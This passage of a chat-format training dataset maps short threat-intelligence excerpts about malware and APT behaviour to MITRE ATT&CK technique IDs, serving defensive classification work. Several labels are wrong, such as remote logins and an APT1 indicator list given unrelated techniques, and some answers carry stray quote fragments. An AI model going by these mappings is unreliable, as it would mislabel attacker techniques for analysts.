- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At line 40, that data is piped through the base64 utility for decoding, dropped in a subfolder in the /tmp directory, given executable permissions via chmod, and then launched as the 2nd stage payload"
- },
- {
- "role": "assistant",
- "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of using HTTP, HTTPS, SMTP, and DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can determine the country a victim host is located in."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The LNK file is moved to the startup directory"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has deleted scripts after execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dir c:\\"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Freenki is used to gather information about the infected system and to download a subsequent stage payload"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a plugin that can perform ARP scanning as well as port scanning."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw."
- },
- {
- "role": "assistant",
- "content": "T1211 - Exploitation for Defense Evasion', 'T1190 - Exploit Public-Facing Application', 'T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot decodes embedded XOR strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used the \"net view\" command to show all shares available, including the administrative shares such as \"C$\" and \"ADMIN$\"."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has encrypted their C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has dropped implants in folders named for legitimate software."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito uses the \"ipconfig\" command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QAKBOT has gained execution through users opening malicious attachments"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar can accept multiple URLs for C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value \"Chrome Update\" to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry scans its local network segment for remote systems to try to exploit and copy itself to."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "injects itself into various processes depending on whether it is low integrity or high integrity."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot deletes all artifacts associated with the malware from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for files named logins.json to parse for credentials and also looks for credentials stored from browsers."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: SecureWorks) Reentry attempt After BRONZE UNION was evicted from a compromised environment, which involved blocking the group's known infrastructure, CTU researchers observed the group attempting to reconnect to its OWA web shells and a backup web shell it had deployed during the intrusion"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collected complete contents of the 'Pictures' folder from compromised Windows systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork dumped the login data database from \"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\"."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can exfiltrate stolen information over its C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla can go through a list of C2 server IPs and will try to register with each until one responds."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete created their own directories to drop files into."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During execution, malware deobfuscates and decompresses code that was encoded with Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has attempted to run Darkside ransomware with the filename sleep.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx uses rundll32 to call an exported function."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess can encrypt browser database files prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete's collected data is exfiltrated over the same channel used for C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar adds a sub-key under several Registry run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with Redline™, Mandiant's free host-based investigative tool, or with Mandiant Intelligent Response® (MIR), Mandiant's commercial enterprise investigative tool"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can support encrypted communications between the client and server."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a batch file to load a DLL into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used command line for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer queries the system to identify existing services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed adding the downloaded payload to the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it deletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check of what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". For this, the following HTTP request is used which contains also data from the victim as well the JPEG files"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017."
- },
- {
- "role": "assistant",
- "content": "T1218.013 - Mavinject"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "keylogger) may be missing for these platforms"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C:\\Windows\\System32\\sethc.exe"
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use WMI to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT can upload and download files to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has copied files of interest to the main drive's recycle bin."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used native APIs including \"GetModuleFileName\", \"lstrcat\", \"CreateFile\", and \"ReadFile\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame’s completeness – the ability to steal data in so many different ways"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp deletes files to remove evidence on the machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hashing algorithm generates a CRC32 hash of the string, converted to lowercase. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules. The hash algorithm has been replicated in Python below"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
